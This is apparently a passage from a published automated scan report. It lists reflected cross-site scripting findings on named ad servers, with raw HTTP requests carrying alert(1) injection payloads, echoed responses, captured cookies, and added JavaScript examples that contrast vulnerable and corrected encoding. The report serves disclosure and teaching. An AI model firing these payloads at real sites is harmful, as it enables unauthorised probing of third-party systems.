GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778?click=http://global.ard.yahoo.com/SIG=15lksbmi2/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=XlBgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6304414/R=0/*80241</script><script>alert(1)</script>c5dc4fefe22 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=33:1411:1148:100:0:43835:1307361371:B2|33:353:198:141:0:43835:1307361205:B2|33:1391:835:0:0:43835:1307361203:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 13 Jun 2011 11:20:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2519

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
bmi2/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=XlBgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6304414/R=0/*80241</script><script>alert(1)</script>c5dc4fefe22">
...[SNIP]...

4.41. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbd25</script><script>alert(1)</script>0570fbfbabe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778?click=http://global.ard.yahoo.com/SIG=15lksbmi2/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=XlBgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6304414/R=0/*&fbd25</script><script>alert(1)</script>0570fbfbabe=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=33:1411:1148:100:0:43835:1307361371:B2|33:353:198:141:0:43835:1307361205:B2|33:1391:835:0:0:43835:1307361203:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 13 Jun 2011 11:20:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2525

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
mi2/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=XlBgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6304414/R=0/*&fbd25</script><script>alert(1)</script>0570fbfbabe=1">
...[SNIP]...

4.42. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks (the href of the <a> click-through link in the response below; unknown query parameters are passed through into the click URL without URL-encoding or HTML-encoding). The payload b1cfe"><script>alert(1)</script>b25c941bd8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
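The following is an added example written for this page, not code from the XSS.CX report or from ad.yieldmanager.com. It models what the response in 4.42 shows: unknown query parameters are forwarded by name into the imageclick URL, which is then placed in an href attribute. The pass-through behaviour, the KNOWN parameter list and the omission of the server's _salt and t parameters are assumptions; the query string is quoted from the finding's request. Two encodings are missing in the vulnerable path and both are applied in the fixed one: percent-encoding when the new query string is built, and HTML attribute encoding when the URL is written into the tag.

```javascript
// Added example (not the ad server's code). Finding 4.42: a parameter *name*
// is forwarded into a click URL inside an href attribute.

// Query string quoted from the finding's request. The last name is the payload.
const RAW_QUERY = 'ad_type=iframe&ad_size=160x600&section=806254&b1cfe"><script>alert(1)</script>b25c941bd8e=1';
// Assumed: these are the server's own parameters; anything else is passed through.
const KNOWN = ['ad_type', 'ad_size', 'section'];

// Split a query string into [name, value] pairs without decoding.
function splitQuery(qs) {
  return qs.split('&').filter(Boolean).map((pair) => {
    const eq = pair.indexOf('=');
    return eq < 0 ? [pair, ''] : [pair.slice(0, eq), pair.slice(eq + 1)];
  });
}

// Decode a query component exactly once; leave malformed input as-is.
function pctDecode(s) {
  try { return decodeURIComponent(s.replace(/\+/g, ' ')); } catch (e) { return s; }
}

// Encode for a double-quoted HTML attribute value.
function htmlAttrEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: raw names and values are concatenated into the URL and the tag.
function clickTagVulnerable(qs) {
  const pairs = splitQuery(qs);
  const get = (k) => (pairs.find(([n]) => n === k) || [k, ''])[1];
  const extra = pairs.filter(([n]) => !KNOWN.includes(n)).map(([n, v]) => n + '=' + v);
  const url = 'http://ad.yieldmanager.com/imageclick?Z=' + get('ad_size') +
    (extra.length ? '&' + extra.join('&') : '') + '&s=' + get('section');
  return '<a href="' + url + '" target="_parent">';
}

// Fixed: decode once, rebuild the query with encodeURIComponent on names and
// values (URL context), then HTML-encode the whole URL (attribute context).
function clickTagFixed(qs) {
  const pairs = splitQuery(qs).map(([n, v]) => [pctDecode(n), pctDecode(v)]);
  const get = (k) => (pairs.find(([n]) => n === k) || [k, ''])[1];
  const extra = pairs.filter(([n]) => !KNOWN.includes(n));
  const query = [['Z', get('ad_size')], ...extra, ['s', get('section')]]
    .map(([n, v]) => encodeURIComponent(n) + '=' + encodeURIComponent(v)).join('&');
  const url = 'http://ad.yieldmanager.com/imageclick?' + query;
  return '<a href="' + htmlAttrEncode(url) + '" target="_parent">';
}

// Number of tags the HTML parser would see; the template intends exactly one.
function tagCount(html) {
  return (html.match(/<\/?[a-z]/gi) || []).length;
}

// The href value as the browser sees it: up to the first quote, entities decoded.
function hrefAsSeen(html) {
  const m = /href="([^"]*)"/.exec(html);
  return m[1].replace(/&quot;/g, '"').replace(/&lt;/g, '<').replace(/&gt;/g, '>')
    .replace(/&#x27;/g, "'").replace(/&amp;/g, '&');
}

console.log('vulnerable:', clickTagVulnerable(RAW_QUERY), 'tags seen:', tagCount(clickTagVulnerable(RAW_QUERY)));
console.log('fixed:     ', clickTagFixed(RAW_QUERY), 'tags seen:', tagCount(clickTagFixed(RAW_QUERY)));
```

The fixed output still carries the attacker's parameter name, percent-encoded, so the click URL keeps working for legitimate pass-through values; the data is preserved, only its interpretation as markup is removed. Rejecting unknown parameter names outright would be a sound alternative if the pass-through is not needed.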

Request

GET /st?ad_type=iframe&ad_size=160x600&section=806254&b1cfe"><script>alert(1)</script>b25c941bd8e=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!*!$([W!(WdF!$Rc1!1mH9!%ei3!!!!$!?5%!)di=9!wVd.!%vS!!$iom!'t56~~~~~=!i98~~!$%ST~!%.B?!1UC$!%`n`!!!!$!?5%!$8o10!ZmB)!'mla!'me'~~~~~~=$G!==%EaVM.jTN!#+s2!,x.^!%)<k!0)2c!$tyl!6Z#3!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Jsh='HAD!!!([!#2Jp!,x.^!%)<k!2A@,!$u!!!7MU<!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Ju6='T?<!!!([!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!#Jl?!,x.^!%)<k!.#:A!%IaL!H<'$!?5%!(L(6:!w1K*!(#l)!#Ae[!%f(g~~~~~=$L#)=%JbC!!!([!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; ih="b!!!!E!'4@g!!!!#=$KA3!-5BI!!!!$=$J^*!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.`.U!!!!#='htS!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1e75!!!!#=%3V6!1mH9!!!!#=!i98!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2"; vuday1=Gf(n`NBHr8*mOw]; 
bh="b!!!%*!!!?J!!!!(=$_d[!!(1-!!!!+=%=]S!!*lZ!!!!#=$Wj6!!*oY!!!!$=%@(m!!,WM!!!!#=$Wj6!!-?2!!!!)=%@(m!!-O3!!!!)=%@(m!!..X!!!!'=$L=p!!/GK!!!!+=%=]S!!/GR!!!!+=%=]S!!/Ju!!!!#=$_d[!!/K$!!!!%=%=]S!!/i,!!!!*=%@(m!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2)!!!!!*=%@(m!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!%=%=]S!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!,=%=]S!!J<K!!!!,=%=]S!!J<O!!!!*=%=]S!!J<S!!!!,=%=]S!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OgU!!!!*=%@(m!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Phu!!!!$=%@(m!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!)=%@(m!!Zwb!!!!$=%@(m!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!,=%=]S!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!kl+!!!!$=%@(m!!kl,!!!!$=%@(m!!mL?!!!!#=%=pu!!mo!!!!!$=%@(m!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!tjQ!!!!$=%@(m!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#+]S!!!!*=%@(m!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#6f-!!!!#=!iRq!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!*=%=]S!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!*=%=]S!#MTF!!!!'=%=]S!#MTH!!!!,=%=]S!#MTI!!!!,=%=]S!#MTJ!!!!,=%=]S!#Nyi!!!!#=!eq^!#O29!!!!(=%@(m!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#SV*!!!!*=%@(m!#Sq>!!!!#='>m<!#T,d~~!#T^F!!!!#=!yv!!#UDQ!!!!,=%=]S!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Z8A!!!!$=%@(m!#Z8E!!!!)=%@(m!#]%`!!!!#=#33)!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Z!!!!!(=%@(m!#]Z#!!!!$=%@(m!#]w)!!!!*=%=]S!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^
0%!!!!*=%@(m!#^d6!!!!#=#33)!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-7!!!!)=%@(m!#`-Z!!!!$=%=]S!#`-[!!!!$=%=]S!#`U0!!!!$=%@(m!#`cS!!!!#=%id8!#a=6!!!!$=%@(m!#a=7!!!!$=%@(m!#a=9!!!!$=%@(m!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg!!!!#=!iRr!#bTx!!!!#=%if4!#biv!!!!#=!iK0!#bj8!!!!#=#mS:!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8V!!!!(=%@(m!#c8X!!!!(=%@(m!#c8c!!!!(=%@(m!#c8i!!!!(=%@(m!#c8m!!!!(=%@(m!#c8p!!!!(=%@(m!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fBj!!!!)=%@(m!#fBk!!!!)=%@(m!#fBm!!!!)=%@(m!#fBn!!!!)=%@(m!#fFG!!!!#=#T_g!#fG)!!!!$=%@(m!#fG+!!!!$=%@(m!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g/7!!!!*=%@(m!#g=r!!!!$=%@(m!#gsl!!!!#=#mS:!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#k]0!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!*=%=]S!#uR3!!!!$=%@(m!#uR7!!!!)=%@(m!#uRN!!!!#=#mS:!#uRP!!!!#=#mS:!#uY<!!!!#=!yv$!#v,U!!!!#=#mS:!#v,Y!!!!#=#mS:!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xG5!!!!#=!yuk!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$#9a!!!!#=%j],!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#X4!!!!#=#%VO!$#yu!!!!*=%=]S!$$K<!!!!#=#$.g!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$'@Q!!!!$=%@(m!$(!P!!!!)=%@(m!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$*hf!!!!$=%@(m!$+Dr!!!!#=#mS:!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-,y!!!!#=#mS:!$-kY!!!!#=#mS:!$-kv!!!!#=#mS:!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5"; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:03:32 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 11:03:32 GMT
Pragma: no-cache
Content-Length: 4724
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=160x600&b1cfe"><script>alert(1)</script>b25c941bd8e=1&s=806254&_salt=4127608432&t=2" target="_parent">
...[SNIP]...

4.43. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f866"-alert(1)-"91e191e34f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
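The following is an added example written for this page, not code from the XSS.CX report or from ad.wsod.com or ad.yieldmanager.com. It covers findings 4.37 to 4.41 and 4.43 together, because all of them land inside a double-quoted JavaScript string literal but break out in two different ways: 4.43 closes the literal with a quote, while 4.37 to 4.41 never touch the quote and instead write </script>, which the HTML tokenizer honours before the JavaScript parser runs. The template shape (var click = "…") and the variable name are assumptions; the two payloads are quoted from findings 4.37 and 4.43. The check walks the literal the way a JS lexer does and then applies the HTML rule that "</script" followed by whitespace, "/" or ">" ends the element regardless of JavaScript context.

```javascript
// Added example (not code from the report or the scanned ad servers).
// Two breakout techniques against one double-quoted JS string literal, and why
// escaping only the quote character stops one of them and not the other.

// Payloads quoted from findings 4.37 and 4.43.
const CLOSE_TAG_PAYLOAD = '4569b</script><script>alert(1)</script>c81f0fa8af3';
const QUOTE_PAYLOAD = '9f866"-alert(1)-"91e191e34f5';

// Assumed template: the echoed value becomes the body of a double-quoted
// string; the variable name `click` is an assumption.
const PREFIX = '<script type="text/javascript">var click = "';
const SUFFIX = '";</script>';

function renderPage(encodedValue) {
  return '<html><body>' + PREFIX + encodedValue + SUFFIX + '</body></html>';
}

// Naive defence: backslash-escape only the backslash and the double quote.
function quoteOnlyEscape(s) {
  return s.replace(/\\/g, '\\\\').replace(/"/g, '\\"');
}

// Correct defence for a JS string literal: \uXXXX-encode everything outside a
// small safe set. With < / > encoded the literal can never spell "</script";
// with quotes, backslash and line terminators encoded it cannot end early.
function jsStringEncode(s) {
  return s.replace(/[^A-Za-z0-9 _.,-]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// True if the rendered page still has the shape the template intended.
// A backslash consumes the next character (JS lexer rule); then the HTML rule:
// "</script" + whitespace, "/" or ">" inside the literal ends the element.
function stringLiteralIntact(html) {
  const start = html.indexOf(PREFIX);
  if (start < 0) return false;
  let i = start + PREFIX.length;
  while (i < html.length && html[i] !== '"') i += html[i] === '\\' ? 2 : 1;
  if (i >= html.length) return false;
  const literal = html.slice(start + PREFIX.length, i);
  if (/<\/script[\s\/>]/i.test(literal)) return false;
  return html.slice(i) === SUFFIX + '</body></html>';
}

// The encoded literal must still mean the original string. JSON.parse accepts
// exactly the \uXXXX escapes jsStringEncode emits, so it doubles as a decoder.
function roundTrips(s) {
  return JSON.parse('"' + jsStringEncode(s) + '"') === s;
}

// Stand-alone demonstration: raw, quote-only, and full encoding per payload.
for (const [name, payload] of [['4.37', CLOSE_TAG_PAYLOAD], ['4.43', QUOTE_PAYLOAD]]) {
  console.log(name,
    'raw:', stringLiteralIntact(renderPage(payload)),
    'quote-only:', stringLiteralIntact(renderPage(quoteOnlyEscape(payload))),
    'jsStringEncode:', stringLiteralIntact(renderPage(jsStringEncode(payload))));
}
```

Quote-only escaping passes the 4.43 payload and fails the 4.37 payload; the \uXXXX encoder passes both and is lossless. The same encoder is what a JSON serializer should be configured to do when data is embedded in a script block, and it is also why the safer pattern is to put the value in a data- attribute or a JSON <script type="application/json"> island and read it from there.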

Request

GET /st?ad_type=ad&ad_size=160x600&section=1812134&9f866"-alert(1)-"91e191e34f5=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://adopt.imiclk.com/emb/q?01AD=2-2-B0214141DED1291A4FF0463D9E06444BD5100362C216DF15CC667F2767BC1758-991AD395E12A9826D82DE593D62CFBCFAE28214D0237D0E3F7994E1DF381CB11&01RI=6BDF326C1D1D9D9&01NA=&size=160x600&m=3&l=1575606&c=162
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!*!$([W!(WdF!$Rc1!1mH9!%ei3!!!!$!?5%!)di=9!wVd.!%vS!!$iom!'t56~~~~~=!i98~~!$%ST~!%.B?!1UC$!%`n`!!!!$!?5%!$8o10!ZmB)!'mla!'me'~~~~~~=$G!==%EaVM.jTN!#+s2!,x.^!%)<k!0)2c!$tyl!6Z#3!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Jsh='HAD!!!([!#2Jp!,x.^!%)<k!2A@,!$u!!!7MU<!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Ju6='T?<!!!([!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!#Jl?!,x.^!%)<k!.#:A!%IaL!H<'$!?5%!(L(6:!w1K*!(#l)!#Ae[!%f(g~~~~~=$L#)=%JbC!!!([!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; bh="b!!!%*!!!?J!!!!(=$_d[!!(1-!!!!+=%=]S!!*lZ!!!!#=$Wj6!!*oY!!!!$=%@(m!!,WM!!!!#=$Wj6!!-?2!!!!)=%@(m!!-O3!!!!)=%@(m!!..X!!!!'=$L=p!!/GK!!!!+=%=]S!!/GR!!!!+=%=]S!!/Ju!!!!#=$_d[!!/K$!!!!%=%=]S!!/i,!!!!*=%@(m!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2)!!!!!*=%@(m!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!%=%=]S!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!,=%=]S!!J<K!!!!,=%=]S!!J<O!!!!*=%=]S!!J<S!!!!,=%=]S!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OgU!!!!*=%@(m!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Phu!!!!$=%@(m!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!)=%@(m!!Zwb!!!!$=%@(m!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!,=%=]S!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!kl+!!!!$=%@(m!!kl,!!!!$=%@(m!!mL?!!!!#=%=pu!!mo!!!!!$=%@(m!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!tjQ!!!!$=%@(m!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#+]S!!!!*=%@(m!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#6f-!!!!#=!iRq!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#
